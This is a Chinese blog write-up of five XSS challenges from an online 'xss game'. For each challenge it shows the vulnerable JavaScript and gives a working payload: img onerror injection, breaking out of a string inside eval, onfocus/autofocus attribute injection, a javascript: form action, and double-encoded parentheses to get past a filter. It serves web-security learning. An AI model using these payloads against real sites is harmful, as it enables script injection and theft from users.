当前位置: 首页 > news >正文

xss 漏洞复现

xss 漏洞复现

一,xss game

1,源码

<!-- Challenge -->
<h2 id="spaghet"></h2>
<script>spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>

题目分析:接收somebody参数放入innerHTML,然后放在

标签展示。innerHTML标签中警用了script标签,所以使用标签。

?somebody=<img src=1 onerror="alert(1337)">

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

2,源码

<!-- Challenge -->
<h2 id="maname"></h2>
<script>let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")let ma = ""eval(`ma = "Ma name ${jeff}"`)setTimeout(_ => {maname.innerText = ma}, 1000)
</script>//eval(`ma = "Ma name a";alert(1337);""`)

题目分析:innertext会把<>当成字符串解析,安全系数很高,此题危险方法是eval,进行闭合操作。

思路一  ?jeff=a";alert(1337);"
思路二  ?jeff=a"-alert(1337);-"  连接符?jeff=a"-alert(1337);"

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

3,源码

<!-- Challenge -->
<div id="uganda"></div>
<script>let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");wey = wey.replace(/[<>]/g, '')  //过滤了<>uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

题目分析:闭合"${wey}"处的双引号,加入我们的方法。

?wey=aaa"%20onfocus=alert(1337)%20autofocus="    
autofocus自动对焦
onfocus=alert(1337) 焦点存在时触发函数

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

4,源码

<!-- Challenge -->
<form id="ricardo" method="GET"><input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')setTimeout(_ => {ricardo.submit()}, 2000)  //两秒后自动提交
</script>

题目分析:表单的action处也会出现相应的伪协议事件,需要提交触发。

?ricardo=javascript:alert(1337)

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

5,源码

<!-- Challenge -->
<h2 id="will"></h2>
<script>smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")smith = smith.replace(/[\(\`\)\\]/g, '') will.innerHTML = smith
</script>

题目分析:过滤了()`\ 双层编码() %2528 %2529 浏览器会转一次。加location识别编码

?markassbrownlee=<img%20src=1%20onerror=location="javascript:alert%25281337%2529">

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

img%20src=1%20οnerrοr=location=“javascript:alert%25281337%2529”>


[外链图片转存中...(img-INiW5cpV-1724041595122)]

http://www.mrgr.cn/news/4784.html

相关文章:

  • git 指令
  • 计算机四个方面:计算、存储、通信与程序;操作系统
  • ps磨皮滤镜插件Imagenomic Portraiture 4.5 Build 4501中文版
  • 汇编语言:标志寄存器ZF、PF、SF、CF、OF、DF、IF、AF
  • EmguCV学习笔记 VB.Net 2.5 Mat类、Matrix类和Image类的相互转换
  • keepalive原理详解及应用
  • insmod后发生了什么
  • Linux 软件编程学习第十七天
  • 【图像超分】论文精读:AdaBM: On-the-Fly Adaptive Bit Mapping for Image Super-Resolution
  • Web前端:CSS篇(三)盒子模型,弹性盒子
  • 无人机之喊话器的用途
  • 基于深度学习的位置感知应用
  • esbuild中的Text Loader:简化文本文件处理
  • 【C++初阶】:C++入门篇(一)
  • chmod命令学习1
  • Grafana中的rate与irate以及histogram
  • 基于Ubuntu22.04 安装SSH服务
  • C++中二叉搜索树的底层原理及实现
  • 打卡学习Python爬虫第二天|Web请求过程刨析
  • 【jvm】栈和堆的区别